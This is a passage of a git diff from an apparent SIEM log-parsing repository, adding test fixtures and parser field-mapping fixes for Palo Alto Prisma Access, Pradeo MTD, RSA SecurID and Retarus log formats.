Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json @@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..70c31c202 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -49,7 +50,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +66,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..140e7657e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..fd4e5a75f --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file diff --git a/Pradeo/pradeo-mtd/ingest/parser.yml b/Pradeo/pradeo-mtd/ingest/parser.yml index 239ce01d4..c10d3c444 100644 --- a/Pradeo/pradeo-mtd/ingest/parser.yml +++ b/Pradeo/pradeo-mtd/ingest/parser.yml @@ -176,16 +176,16 @@ stages: pradeo.device.mdmId: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.externalId}}" pradeo.device.emm: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.emm}}" pradeo.compliance.matchedResponseRules: "{{json_event.message.content.deviceApplication.compliance.matchedResponseRules}}" - pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.application.id}}" - pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.application.package.package}}" - pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.application.package.system}}" - pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.application.version}}" - pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.application.versionCode}}" - pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.application.name}}" - pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.application.md5}}" - pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.application.sha1}}" - pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.application.sha256}}" - pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}" + pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.id}}" + pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.package}}" + pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.system}}" + pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.version}}" + pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.versionCode}}" + pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.name}}" + pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.md5}}" + pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha1}}" + pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha256}}" + pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.status}}" - filter: '{{json_event.message.type == "DeviceComplianceUpdated"}}' set: event.category: ["process"] diff --git a/Pradeo/pradeo-mtd/tests/application_compliance_updated.json b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json new file mode 100644 index 000000000..916f71473 --- /dev/null +++ b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "sekoiaio": { + "intake": { + "dialect": "Pradeo MTD", + "dialect_uuid": "3cedbe29-02f8-42bf-9ec2-0158186c2827" + } + } + }, + "expected": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "event": { + "action": "DeviceApplicationComplianceUpdated", + "category": [ + "process" + ], + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-27T04:10:33.460000Z", + "pradeo": { + "application": { + "id": "azertyuiop", + "md5": "0fccfdefc882c4be6d2a938001184e08", + "name": "App", + "package": "com.app.test", + "sha1": "749c94cd972726ef2b3ccda7e718a2034cc9f6ac", + "sha256": "278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8", + "system": "Android", + "version": "491.0.0.58.78", + "versionCode": "457215664" + }, + "device": { + "byod": false, + "coupled": true, + "declaredModel": "MODEL 01", + "declaredOperatingSystem": "Android", + "declaredOperatingSystemSecurityPatchDate": "2020-09-01T00:00:00Z", + "declaredOperatingSystemVersion": "10.0.0", + "id": "device_id01", + "lastConnection": "2024-11-27T04:07:32Z", + "name": "John", + "serialNumber": "unknown" + }, + "metadata": { + "creationDate": "2024-11-27T04:10:33.460000Z", + "id": "1234567890", + "source": "system", + "type": "DeviceApplicationComplianceUpdated" + } + } + } +} \ No newline at end of file diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/Salesforce/salesforce-events/_meta/fields.yml b/Salesforce/salesforce-events/_meta/fields.yml index 